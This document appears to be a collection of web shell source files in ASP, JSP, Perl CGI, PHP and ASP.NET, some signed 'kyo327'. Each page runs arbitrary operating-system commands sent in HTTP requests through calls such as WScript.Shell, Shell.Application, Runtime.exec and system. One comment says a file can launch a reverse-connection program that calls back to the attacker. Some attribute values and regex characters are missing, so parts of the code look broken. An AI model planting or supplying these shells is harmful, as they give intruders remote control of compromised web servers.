cmd1.asp
<object runat=server id=shell scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<%if err then%>
<object runat=server id=shell scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<% end if %>
<form method="post">
<input type=text name="cmdx" size= value="C:\Documents and Settings\All Users\cmd.exe"><br>
<input type=text name="cmd" size= value="<%=request.form("cmd")%>"><br>
<input type=submit value="cmd命令"></form>
<textarea readonly cols= rows=>
<%On Error Resume Next
if request.form("cmdx")="C:\Documents and Settings\All Users\cmd.exe" then
response.write shell.exec("cmd.exe /c"&request.form("cmd")).stdout.readall
end if
response.write shell.exec(request.form("cmdx")&" /c"&request.form("cmd")).stdout.readall
%>
</textarea>
cmd2.asp
<center><%response.write "<font size=4 color=red>shellapplication执行命令 无回显</font>" %>
<BR>程序所在的物理路径:
<%response.write request.servervariables("APPL_PHYSICAL_PATH")%> </center>
<html><title>shellapplication执行命令 by kyo327 </title>
<body><br/><center>
<form action="<%= Request.ServerVariables("URL") %>" method="POST">
<br>程序路径:<br/>
<input type=text name=text1 size= value="C:\Documents and Settings\All Users\Documents\cmd.exe"> <br/>
参数:<br/><input type=text name=text2 size= value="<%=canshu%>"><br/>
<input type=submit name=makelove value=运行>
</form> </center></body> </html>
<%
appnames = Request.Form("text1")
canshu = Request.Form("text2")
if appnames<>"" then
set kyoshell=createobject("shell.application")
kyoshell.ShellExecute appnames,canshu,"","open",
response.write "<center>执行成功!</center>"
end if
%>
cmd.jsp
<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>
cmd.cgi
#!/usr/bin/perl
read(STDIN,$POST,$ENV{'CONTENT_LENGTH'});
($key,$command)=split(/=/,$POST);
$command=~s/%([a-fA-f0-][a-fA-f0-])/pack("C",hex($))/eg;
$command=~s/\+/ /;
$output=system "$command>a.txt";
$output=~s/\n/\<br\>/;
print "Content-Type: text/html\n\n";
print <<EOF;
<form action="" method=POST>
<input type=text size= name=command value=""><br>
<input type=submit value=ok>
</form>
EOF
open(OUTPUT,"a.txt")||die "cannot open $!";
@output=<OUTPUT>;
print <<EOF;
<textarea name="textfield" cols="80" rows="60">@output</textarea>
EOF
close OUTPUT;
unlink ("a.txt");
exit;
cmd.cfm
#!/usr/bin/perl
read(STDIN,$POST,$ENV{'CONTENT_LENGTH'});
($key,$command)=split(/=/,$POST);
$command=~s/%([a-fA-f0-][a-fA-f0-])/pack("C",hex($))/eg;
$command=~s/\+/ /;
$output=system "$command>a.txt";
$output=~s/\n/\<br\>/;
print "Content-Type: text/html\n\n";
print <<EOF;
<form action="" method=POST>
<input type=text size= name=command value=""><br>
<input type=submit value=ok>
</form>
EOF
open(OUTPUT,"a.txt")||die "cannot open $!";
@output=<OUTPUT>;
print <<EOF;
<textarea name="textfield" cols="80" rows="60">@output</textarea>
EOF
close OUTPUT;
unlink ("a.txt");
exit;
cmd1.php
<?php
if (key($_GET)=="system") {
system($_GET['system']);
} elseif (key($_GET)=="passthru") {
passthru($_GET['passthru']);
} elseif (key($_GET)=="exec") {
$result = exec($_GET['exec']);
echo $result;
} elseif (key($_GET)=="shell_exec") {
$result=shell_exec($_GET['shell_exec']);
echo $result;
} elseif (key($_GET)=="popen") {
$pp = popen($_GET['popen'], 'r');
$read = fread($pp, 2096);
echo $read;
pclose($pp);
} elseif (key($_GET)=="wscript") {
$wsh = new COM('WScript.shell') or die("PHP Create COM wscript.shell failed");
$exec = $wsh->exec ("cm"."d.e"."xe /c ".$_GET['wscript']."");
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
} elseif(key($_GET)=="proc_open"){
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = proc_open("C:\\Docume~1\\alluse~1\\Documents\\cmd.exe", $descriptorspec, $pipes);
if (is_resource($process)) {
fwrite($pipes[0], "".$_GET['proc_open']."\r\n");
fwrite($pipes[0], "exit\r\n");
fclose($pipes[0]);
while (!feof($pipes[1])) {
echo fgets($pipes[1], 1024);
}
fclose($pipes[1]);
while (!feof($pipes[2])) {
echo fgets($pipes[2], 1024);
}
fclose($pipes[2]);
proc_close($process);
}}
?>
cmd2.php
<?php
$wsh = new COM('Shell.Application') or die("Shell.Application");
$exec = $wsh->open("C:\\Docume~1\\alluse~1\\Documents\\fanlian.exe");
//没有回显,多了个fanlian进程,可以直接执行一个反向连接程序反弹回来
?>
cmd1.aspx
<%@ Page Language="c#" validateRequest = "false" aspcompat = "true" %>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1" runat="server">
<title>cmdshell</title></head>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<script language="C#" runat="server">
void Button_Click1(object sender, EventArgs e)
{
try
{
Process shell = new Process();
shell.StartInfo.FileName = PathTextBox.Text;
shell.StartInfo.Arguments = ShellTextBox.Text;
shell.StartInfo.UseShellExecute = false;
shell.StartInfo.RedirectStandardInput = true;
shell.StartInfo.RedirectStandardOutput = true;
shell.StartInfo.RedirectStandardError = true;
shell.Start();
string str1 = shell.StandardOutput.ReadToEnd();
str1 = str1.Replace("<", "<");
str1 = str1.Replace(">", ">");
myLabel.Text = "<hr><pre>" + str1 + "</pre>";
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
}
</script>
<body>
<center><font size= color=red>asp.net命令执行 by kyo</font><br /></center>
<form id="form1" runat="server"><div style="text-align: center">
<asp:Panel ID="CmdPanel" runat="server" Height="50px" Width="800px"><hr />
程序路径 :<asp:TextBox ID="PathTextBox" runat="server" Width="395px">C:\Documents and Settings\All Users\Documents\cmd.exe</asp:TextBox><br />
命令参数 :<asp:TextBox ID="ShellTextBox" runat="server" Width="395px">/c ver</asp:TextBox><br />
<asp:Button ID="RunButton" runat="server" OnClick="Button_Click1" Text="运行" /></div>
<div style="text-align: left">
<asp:Label ID="myLabel" runat="server" EnableViewState="False"></asp:Label></div>
<hr /></asp:Panel></form></body>
</html>
cmd2.aspx
<%@ Page Language="VB" validateRequest = "false" aspcompat = "true" Debug="true"%>
<script runat="server">
sub run(Src As Object, E As EventArgs)
Dim StrResult As String
Dim shell As Object
shell = Server.CreateObject("WScript.Shell")
StrResult = shell.exec( path.Text & " /c " & box.Text ).stdout.readall
StrResult = Replace(StrResult , "<","<")
StrResult = Replace(StrResult , ">",">")
ResultLabel.Text = "<pre>" & StrResult & "</pre>"
end sub
</script>
<html><head></head><body>
<form runat="server">
程序路径:<asp:TextBox ID="path" Width="" Text="C:\Documents and Settings\All Users\Documents\cmd.exe"
runat="server" />
<br>命令参数:<asp:TextBox ID="box" Width="" runat="server" />
<asp:Button ID="Button" Text="Run" OnClick="run" runat="server" /><br>
<asp:Label ID="ResultLabel" runat="server" />
</form></body></html>
cmd3.aspx
<!--
Titel: shell.application
Author: kyo327
Date: --
-->
<%@ Page Language="VB" validateRequest = "false" aspcompat = "true" %>
<script runat="server">
sub run(Src As Object, E As EventArgs)
Dim appName As String
Dim appArgs As String
Dim love As Object
love = Server.CreateObject("Shell.Application")
appName = appnames.Text
appArgs = canshu.Text
love.ShellExecute(appName, appArgs, "", "open", )
end sub
</script><html>
<head><title>shellapplication For ASP.NET By kyo327</title></head>
<body><form id="Form1" runat="server">
<center><font color=red size=>利用shell.application执行命令for asp.net</font><br />
<br>程序路径名:<br />
<asp:TextBox ID="appnames" Width="" Text="C:\Documents and Settings\All Users\Documents\cmd.exe" runat="server" /> <br>参数:<br />
<asp:TextBox ID="canshu" Width="" runat="server" /> <br /><br />
<asp:Button ID="Button" Text="运行" OnClick="run" runat="server" /><br>
</form></center></body></html>